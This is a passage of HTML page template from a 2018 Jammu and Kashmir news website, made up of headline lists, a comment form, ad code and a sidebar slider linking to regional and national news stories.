			<time datetime="2018-02-25T16:52:45+00:00">February 25, 2018</time>
			</div>
                </li>

	       <li>
			                        <a href="http://news.statetimes.in/6-civilians-killed-13-injured-in-pak-shelling-during-last-10-months-in-j-k/"><img src="http://news.statetimes.in/wp-content/uploads/2017/12/ceasefire-lead-190x122.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2017/12/ceasefire-lead-610x356.jpg" alt="6 civilians killed, 13 injured in Pak shelling during last 10 months in J-K"></a>
			                        <h4><a itemprop="name" href="http://news.statetimes.in/6-civilians-killed-13-injured-in-pak-shelling-during-last-10-months-in-j-k/">6 civilians killed, 13 injured in Pak shelling during last 10 months in J-K</a></h4>
                        <div class="mom-post-meta">
			<time datetime="2018-02-25T16:07:45+00:00">February 25, 2018</time>
			</div>
                </li>

	       <li>
			                        <a href="http://news.statetimes.in/militants-gun-down-cop-near-chrar-e-sharif-shrine-in-jks-budgam/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-190x122.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO.jpg" alt="Militants gun down cop near Chrar-e-Sharif shrine in J&K's Budgam"></a>
			                        <h4><a itemprop="name" href="http://news.statetimes.in/militants-gun-down-cop-near-chrar-e-sharif-shrine-in-jks-budgam/">Militants gun down cop near Chrar-e-Sharif shrine in J&#038;K&#8217;s Budgam</a></h4>
                        <div class="mom-post-meta">
			<time datetime="2018-02-25T16:06:15+00:00">February 25, 2018</time>
			</div>
                </li>

	       <li>
			                        <a href="http://news.statetimes.in/j-k-exploits-just-16-of-hydro-power-potential-despite-growing-demand-survey/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-190x122.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO.jpg" alt="J-K exploits just 16% of hydro-power potential despite growing demand: Survey"></a>
			                        <h4><a itemprop="name" href="http://news.statetimes.in/j-k-exploits-just-16-of-hydro-power-potential-despite-growing-demand-survey/">J-K exploits just 16% of hydro-power potential despite growing demand: Survey</a></h4>
                        <div class="mom-post-meta">
			<time datetime="2018-02-25T15:53:16+00:00">February 25, 2018</time>
			</div>
                </li>

	       <li>
			                        <a href="http://news.statetimes.in/state-bank-of-india-in-uk-set-for-major-restructuring/"><img src="http://news.statetimes.in/wp-content/uploads/2017/05/SBI-Q4-net-more-than-doubles-to-Rs-2815-cr-190x122.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2017/05/SBI-Q4-net-more-than-doubles-to-Rs-2815-cr.jpg" alt="State Bank of India in UK set for major restructuring"></a>
			                        <h4><a itemprop="name" href="http://news.statetimes.in/state-bank-of-india-in-uk-set-for-major-restructuring/">State Bank of India in UK set for major restructuring</a></h4>
                        <div class="mom-post-meta">
			<time datetime="2018-02-25T14:09:50+00:00">February 25, 2018</time>
			</div>
                </li>

</ul>
</div>

<div id="comments" class="comments-area">

	
		
		<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">Leave a Reply <small><a rel="nofollow" id="cancel-comment-reply-link" href="/n-korea-slams-latest-us-sanctions-as-act-of-war/#respond" style="display:none;">Cancel Reply</a></small></h3>			<form action="http://news.statetimes.in/wp-comments-post.php" method="post" id="commentform" class="comment-form">
				<p class="comment-notes"><span id="email-notes">Your email address will not be published.</span> Required fields are marked <span class="required">*</span></p><p class="comment-form-comment"><textarea id="comment" placeholder="Comment..." name="comment" cols="45" rows="8" aria-required="true"></textarea></p><input id="author" name="author" type="text" placeholder="Name (required)" value="" size="30" aria-required='true' />
<input id="email" name="email" type="text" placeholder="Email (required)" value="" size="30" aria-required='true' />
<input id="url" name="url" type="text" placeholder="Website" value="" size="30" />
<p class="form-submit"><input name="submit" type="submit" id="submit-comment" class="submit" value="Post Comment" /> <input type='hidden' name='comment_post_ID' value='335137' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p><p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="726fb1e8c9" /></p><p style="display: none;"><input type="hidden" id="ak_js" name="ak_js" value="143"/></p>			</form>
			</div><!-- #respond -->
	
</div><!-- #comments .comments-area -->
            </div> <!--main column-->
                      <div class="sidebar secondary-sidebar" role="complementary" itemscope="itemscope" itemtype="http://schema.org/WPSideBar">
            <div class="widget momizat-posts_list"><div class="widget-head"><h3 class="widget-title"><span>Latest News</span></h3></div>		<ul>
		
			<li><a href="http://news.statetimes.in/working-for-decades-at-bagh-e-bahu-lensmen-at-verge-of-starvation/">Working for decades at Bagh-e-Bahu, lensmen at verge of starvation</a></li>

			
			<li><a href="http://news.statetimes.in/cm-orders-probe-madnis-son-declines-kvib-job-offer/">CM orders probe: Madni&#8217;s son declines KVIB job offer</a></li>

			
			<li><a href="http://news.statetimes.in/6-civilians-killed-13-injured-in-pak-shelling-during-last-10-months-in-j-k/">6 civilians killed, 13 injured in Pak shelling during last 10 months in J-K</a></li>

			
			<li><a href="http://news.statetimes.in/militants-gun-down-cop-near-chrar-e-sharif-shrine-in-jks-budgam/">Militants gun down cop near Chrar-e-Sharif shrine in J&#038;K&#8217;s Budgam</a></li>

			
			<li><a href="http://news.statetimes.in/j-k-exploits-just-16-of-hydro-power-potential-despite-growing-demand-survey/">J-K exploits just 16% of hydro-power potential despite growing demand: Survey</a></li>

			
			<li><a href="http://news.statetimes.in/n-korea-slams-latest-us-sanctions-as-act-of-war/">N Korea slams latest US sanctions as &#8216;act of war&#8217;</a></li>

			
			<li><a href="http://news.statetimes.in/state-bank-of-india-in-uk-set-for-major-restructuring/">State Bank of India in UK set for major restructuring</a></li>

			
			<li><a href="http://news.statetimes.in/govt-appointed-toll-collection-firms-need-to-pay-stamp-duty-hc/">Govt-appointed toll collection firms need to pay stamp duty: HC</a></li>

			
			<li><a href="http://news.statetimes.in/kohli-dhoni-rested-as-india-select-young-squad-for-t20-tri-series/">Kohli, Dhoni rested as India select young squad for T20 tri-series</a></li>

			
			<li><a href="http://news.statetimes.in/nia-to-seek-interpol-red-corner-notice-against-pak-diplomat-wanted-in-terror-plot/">NIA to seek Interpol Red Corner notice against Pak diplomat wanted in terror plot</a></li>

			
			<li><a href="http://news.statetimes.in/day-to-day-safety-should-be-part-of-our-lives-pm-modi/">Day-to-day safety should be part of our lives: PM Modi</a></li>

			
			<li><a href="http://news.statetimes.in/identify-retail-supplier-to-achieve-power-for-all-derc/">Identify retail supplier to achieve power for all: DERC</a></li>

			
			<li><a href="http://news.statetimes.in/un-backs-syria-ceasefire-as-death-toll-in-rebel-enclave-tops-500/">UN backs Syria ceasefire as death toll in rebel enclave tops 500</a></li>

			
			<li><a href="http://news.statetimes.in/astrology-weekly-predictions-25th-04th-march-2018/">Astrology: Weekly predictions 25TH– 04TH MARCH 2018</a></li>

			
			<li><a href="http://news.statetimes.in/chawla-flags-concerns-about-5g-mobile-technology-writes-to-cm/">Chawla flags concerns about 5G mobile technology, writes to CM</a></li>

											</ul>
</div>
            </div> <!--main sidebar-->
            <div class="clear"></div>
            <div class="clear"></div>
</div> <!--main container-->            
            <div class="sidebar main-sidebar" role="complementary" itemscope="itemscope" itemtype="http://schema.org/WPSideBar">
            <div class="widget momizat-ads">		<div class="mom-e3lanat-wrap responsive ">
	<div class="mom-e3lanat " style="">
		<div class="mom-e3lanat-inner">
		
				<div class="mom-e3lan" data-id="4677" style="width:px; height:autopx;  ">
		<div class="e3lan-code"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- sidebar one -->
<ins class="adsbygoogle"
     style="display:inline-block;width:300px;height:250px"
     data-ad-client="ca-pub-3121650879019050"
     data-ad-slot="5446915816"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div>	</div><!--mom ad-->
			</div>
	</div>	<!--Mom ads-->
	</div>
</div><div class="widget widget_momizattabber">                        <div class="main_tabs">
                            <ul class="tabs"></ul>
                            <div class="tabs-content-wrap">
                                <div class="tab-content"><a href="#" class="mom-tw-title">Top Stories</a>                                   <div class="mom-posts-widget">

					<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/ceasefire-violation-in-rajouri-pak-targets-indian-posts-in-uri-8000-civilians-shifted-to-safer-areas/"><img src="http://news.statetimes.in/wp-content/uploads/2018/02/Jawan-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2018/02/Jawan-90x60.jpg" alt="Ceasefire violation in Rajouri: Pak targets Indian posts in Uri; 8,000 civilians shifted to safer areas" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/ceasefire-violation-in-rajouri-pak-targets-indian-posts-in-uri-8000-civilians-shifted-to-safer-areas/"><img src="http://news.statetimes.in/wp-content/uploads/2018/02/Jawan-180x120.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2018/02/Jawan-180x120.jpg" alt="Ceasefire violation in Rajouri: Pak targets Indian posts in Uri; 8,000 civilians shifted to safer areas" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/ceasefire-violation-in-rajouri-pak-targets-indian-posts-in-uri-8000-civilians-shifted-to-safer-areas/">Ceasefire violation in Rajouri: Pak targets Indian posts in Uri; 8,000 civilians shifted to safer areas</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2018-02-25T01:33:35+00:00" class="entry-date">February 25, 2018</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/fir-lodged-after-stone-pelting-at-sunjwan-army-camp/"><img src="http://news.statetimes.in/wp-content/uploads/2018/02/Sunjwan-army-camp-Jammu_PTI1-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2018/02/Sunjwan-army-camp-Jammu_PTI1-90x60.jpg" alt="FIR lodged after stone-pelting at Sunjwan Army Camp" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/fir-lodged-after-stone-pelting-at-sunjwan-army-camp/"><img src="http://news.statetimes.in/wp-content/uploads/2018/02/Sunjwan-army-camp-Jammu_PTI1-180x120.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2018/02/Sunjwan-army-camp-Jammu_PTI1-180x120.jpg" alt="FIR lodged after stone-pelting at Sunjwan Army Camp" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/fir-lodged-after-stone-pelting-at-sunjwan-army-camp/">FIR lodged after stone-pelting at Sunjwan Army Camp</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2018-02-25T01:33:31+00:00" class="entry-date">February 25, 2018</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/traffic-suspended-on-jammu-srinagar-nh-heavy-rains-lash-region-triggers-landslide-in-ramban-banihal-sector/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="Traffic suspended on Jammu-Srinagar NH; Heavy rains lash region, triggers landslide in Ramban-Banihal sector" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/traffic-suspended-on-jammu-srinagar-nh-heavy-rains-lash-region-triggers-landslide-in-ramban-banihal-sector/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="Traffic suspended on Jammu-Srinagar NH; Heavy rains lash region, triggers landslide in Ramban-Banihal sector" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/traffic-suspended-on-jammu-srinagar-nh-heavy-rains-lash-region-triggers-landslide-in-ramban-banihal-sector/">Traffic suspended on Jammu-Srinagar NH; Heavy rains lash region, triggers landslide in Ramban-Banihal sector</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2018-02-25T01:33:04+00:00" class="entry-date">February 25, 2018</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/jaitley-to-address-ju-convocation-next-month/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="Jaitley to address JU convocation next month" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/jaitley-to-address-ju-convocation-next-month/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="Jaitley to address JU convocation next month" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/jaitley-to-address-ju-convocation-next-month/">Jaitley to address JU convocation next month</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2018-02-25T01:32:05+00:00" class="entry-date">February 25, 2018</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/govt-accommodation-hc-rejects-former-ministers-mlcs-plea-challenging-eviction/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="GOVT ACCOMMODATION: HC rejects former ministers, MLC's plea challenging eviction" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/govt-accommodation-hc-rejects-former-ministers-mlcs-plea-challenging-eviction/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="GOVT ACCOMMODATION: HC rejects former ministers, MLC's plea challenging eviction" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/govt-accommodation-hc-rejects-former-ministers-mlcs-plea-challenging-eviction/">GOVT ACCOMMODATION: HC rejects former ministers, MLC&#8217;s plea challenging eviction</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2018-02-25T01:31:53+00:00" class="entry-date">February 25, 2018</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/cop-injured-in-accidental-firing/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="Cop injured in accidental firing" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/cop-injured-in-accidental-firing/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="Cop injured in accidental firing" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/cop-injured-in-accidental-firing/">Cop injured in accidental firing</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2018-02-25T01:31:03+00:00" class="entry-date">February 25, 2018</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/eviction-of-gujjars-from-encroached-land-brings-pdp-bjp-at-loggerhead/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="Eviction of Gujjars from ‘encroached’ land brings PDP-BJP at loggerhead" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/eviction-of-gujjars-from-encroached-land-brings-pdp-bjp-at-loggerhead/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="Eviction of Gujjars from ‘encroached’ land brings PDP-BJP at loggerhead" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/eviction-of-gujjars-from-encroached-land-brings-pdp-bjp-at-loggerhead/">Eviction of Gujjars from ‘encroached’ land brings PDP-BJP at loggerhead</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2018-02-25T01:30:37+00:00" class="entry-date">February 25, 2018</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/police-failure-in-monitoring-rohingyas-activities-raises-eyebrows/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="Police failure in monitoring Rohingyas’ activities raises eyebrows" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/police-failure-in-monitoring-rohingyas-activities-raises-eyebrows/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="Police failure in monitoring Rohingyas’ activities raises eyebrows" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/police-failure-in-monitoring-rohingyas-activities-raises-eyebrows/">Police failure in monitoring Rohingyas’ activities raises eyebrows</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2018-02-25T01:29:53+00:00" class="entry-date">February 25, 2018</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/23-killed-in-multiple-attacks-in-afghanistan/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="23 killed in multiple attacks in Afghanistan" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/23-killed-in-multiple-attacks-in-afghanistan/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="23 killed in multiple attacks in Afghanistan" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/23-killed-in-multiple-attacks-in-afghanistan/">23 killed in multiple attacks in Afghanistan</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2018-02-25T01:29:23+00:00" class="entry-date">February 25, 2018</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/despite-objections-engineering-college-for-kathua-sanctioned-dr-jitendra/"><img src="http://news.statetimes.in/wp-content/uploads/2018/02/JPOGINDER-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2018/02/JPOGINDER-90x60.jpg" alt="Despite objections, engineering college for Kathua sanctioned: Dr Jitendra" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/despite-objections-engineering-college-for-kathua-sanctioned-dr-jitendra/"><img src="http://news.statetimes.in/wp-content/uploads/2018/02/JPOGINDER-180x120.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2018/02/JPOGINDER-180x120.jpg" alt="Despite objections, engineering college for Kathua sanctioned: Dr Jitendra" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/despite-objections-engineering-college-for-kathua-sanctioned-dr-jitendra/">Despite objections, engineering college for Kathua sanctioned: Dr Jitendra</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2018-02-25T01:29:06+00:00" class="entry-date">February 25, 2018</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/jammu-bound-goair-flight-grounded-at-leh-airport-after-technical-snag/"><img src="http://news.statetimes.in/wp-content/uploads/2016/04/GoAir-passengers-to-get-discount-at-partner-outlets-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/04/GoAir-passengers-to-get-discount-at-partner-outlets-90x60.jpg" alt="Jammu-bound GoAir grounded at Leh" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/jammu-bound-goair-flight-grounded-at-leh-airport-after-technical-snag/"><img src="http://news.statetimes.in/wp-content/uploads/2016/04/GoAir-passengers-to-get-discount-at-partner-outlets-180x120.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/04/GoAir-passengers-to-get-discount-at-partner-outlets-180x120.jpg" alt="Jammu-bound GoAir grounded at Leh" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/jammu-bound-goair-flight-grounded-at-leh-airport-after-technical-snag/">Jammu-bound GoAir grounded at Leh</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2018-02-24T12:44:21+00:00" class="entry-date">February 24, 2018</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/army-repulses-bat-attack-near-loc-border-residents-moved-to-safer-areas/"><img src="http://news.statetimes.in/wp-content/uploads/2018/02/night-ceasefire-759-580x395.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2018/02/night-ceasefire-759-580x395.jpg" alt="Army repulses BAT attack near LoC, Border residents moved to safer areas" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/army-repulses-bat-attack-near-loc-border-residents-moved-to-safer-areas/"><img src="http://news.statetimes.in/wp-content/uploads/2018/02/night-ceasefire-759-580x395.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2018/02/night-ceasefire-759-580x395.jpg" alt="Army repulses BAT attack near LoC, Border residents moved to safer areas" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/army-repulses-bat-attack-near-loc-border-residents-moved-to-safer-areas/">Army repulses BAT attack near LoC, Border residents moved to safer areas</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2018-02-24T01:03:24+00:00" class="entry-date">February 24, 2018</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/girls-trafficking-police-intensifies-trail-to-nab-absconding-rohingyas/"><img src="http://news.statetimes.in/wp-content/uploads/2014/11/st-follow-up.png?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2014/11/st-follow-up.png" alt="GIRLS TRAFFICKING: Police intensifies trail to nab absconding Rohingyas" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/girls-trafficking-police-intensifies-trail-to-nab-absconding-rohingyas/"><img src="http://news.statetimes.in/wp-content/uploads/2014/11/st-follow-up.png?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2014/11/st-follow-up.png" alt="GIRLS TRAFFICKING: Police intensifies trail to nab absconding Rohingyas" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/girls-trafficking-police-intensifies-trail-to-nab-absconding-rohingyas/">GIRLS TRAFFICKING: Police intensifies trail to nab absconding Rohingyas</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2018-02-24T01:03:07+00:00" class="entry-date">February 24, 2018</span>
			    			    </div>
			</div>
			</div> <!--//post-->

									                                    </div>
</div><div class="tab-content"><a href="#" class="mom-tw-title">Cities n Towns</a>		<ul>
		
			<li><a href="http://news.statetimes.in/working-for-decades-at-bagh-e-bahu-lensmen-at-verge-of-starvation/">Working for decades at Bagh-e-Bahu, lensmen at verge of starvation</a></li>

			
			<li><a href="http://news.statetimes.in/6-civilians-killed-13-injured-in-pak-shelling-during-last-10-months-in-j-k/">6 civilians killed, 13 injured in Pak shelling during last 10 months in J-K</a></li>

			
			<li><a href="http://news.statetimes.in/j-k-exploits-just-16-of-hydro-power-potential-despite-growing-demand-survey/">J-K exploits just 16% of hydro-power potential despite growing demand: Survey</a></li>

			
			<li><a href="http://news.statetimes.in/jammu-srinagar-highway-reopened-for-one-way-traffic/">Jammu-Srinagar highway reopened for one-way traffic</a></li>

			
			<li><a href="http://news.statetimes.in/mlzs-tarore-organises-display-your-talent/">MLZS Tarore organises Display Your Talent</a></li>

			
			<li><a href="http://news.statetimes.in/rm-public-school-bids-farewell-to-class-10th-students/">RM Public School bids farewell to Class 10th students</a></li>

			
			<li><a href="http://news.statetimes.in/jki-employees-hail-drabu-priya-for-pensionary-benefits/">JKI employees hail Drabu, Priya for pensionary benefits</a></li>

			
			<li><a href="http://news.statetimes.in/dgp-prisons-inspects-district-jail/">DGP Prisons inspects district jail</a></li>

			
			<li><a href="http://news.statetimes.in/happy-model-school-celebrates-sports-day/">Happy Model School  celebrates Sports Day</a></li>

			
			<li><a href="http://news.statetimes.in/jiar-organises-free-medical-camp-2/">JIAR organises free medical camp</a></li>

			
			<li><a href="http://news.statetimes.in/absconder-nabbed-4/">Absconder nabbed</a></li>

			
			<li><a href="http://news.statetimes.in/44-two-wheelers-seized-in-rajouri/">44 two-wheelers seized in Rajouri</a></li>

			
			<li><a href="http://news.statetimes.in/missing-man-traced-2/">Missing man traced</a></li>

			
			<li><a href="http://news.statetimes.in/two-attempt-suicide-1-dies-2/">Two attempt suicide, 1 dies</a></li>

			
			<li><a href="http://news.statetimes.in/motorcyclist-injured-in-mishap-in-samba/">Motorcyclist injured in mishap in Samba</a></li>

			
			<li><a href="http://news.statetimes.in/two-shopkeepers-held-for-selling-illicit-liquor/">Two shopkeepers held for selling illicit liquor</a></li>

											</ul>
</div>                            </div>
                        </div> <!--main tabs-->

            </div><div class="widget momizat-posts_slider"><div class="widget-head"><h3 class="widget-title"><span>Entertainment n Lifestyle</span></h3></div>			<script>
			jQuery(document).ready(function ($) {
				jQuery('.mpsw-slider').flexslider({
					animation : 'slide',
					controlNav: false,
					smoothHeight: true,
					prevText: '',
					nextText: '',
					slideshow: 1,
					slideshowSpeed: 4000,
				});
			});
			</script>
			<div class="mom-posts-slide-widget type-">
                            <div class="mpsw-slider">
                              <ul class="slides">
											<li>
			<a href="http://news.statetimes.in/astrology-weekly-predictions-25th-04th-march-2018/"><img src="http://news.statetimes.in/wp-content/uploads/2017/03/Horoscope-circle-Stock-Vector-zodiac-horoscope-astrology-265x168.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2017/03/Horoscope-circle-Stock-Vector-zodiac-horoscope-astrology-265x168.jpg" alt="Astrology: Weekly predictions 25TH– 04TH MARCH 2018" width="265" height="168">			  <p class="slide-caption">Astrology: Weekly predictions 25TH– 04TH MARCH 2018</p>
			  </a>
			</li>
																		<li>
			<a href="http://news.statetimes.in/sridevi-the-diva-who-lit-up-indian-cinema-screen/"><img src="http://news.statetimes.in/wp-content/uploads/2018/02/Sridevi-The-diva-who-lit-up-Indian-cinema-screen-265x168.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2018/02/Sridevi-The-diva-who-lit-up-Indian-cinema-screen-265x168.jpg" alt="Sridevi: The diva who lit up Indian cinema screen" width="265" height="168">			  <p class="slide-caption">Sridevi: The diva who lit up Indian cinema screen</p>
			  </a>
			</li>
																		<li>
			<a href="http://news.statetimes.in/arjun-parineetis-namastey-england-to-hit-theatres-on-december-7/"><img src="http://news.statetimes.in/wp-content/uploads/2018/02/Arjun-Parineetis-Namastey-England-to-hit-theatres-on-December-7-265x168.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2018/02/Arjun-Parineetis-Namastey-England-to-hit-theatres-on-December-7-265x168.jpg" alt="Arjun, Parineeti's 'Namastey England' to hit theatres on December 7" width="265" height="168">			  <p class="slide-caption">Arjun, Parineeti&#8217;s &#8216;Namastey England&#8217; to hit theatres on December 7</p>
			  </a>
			</li>
																		<li>
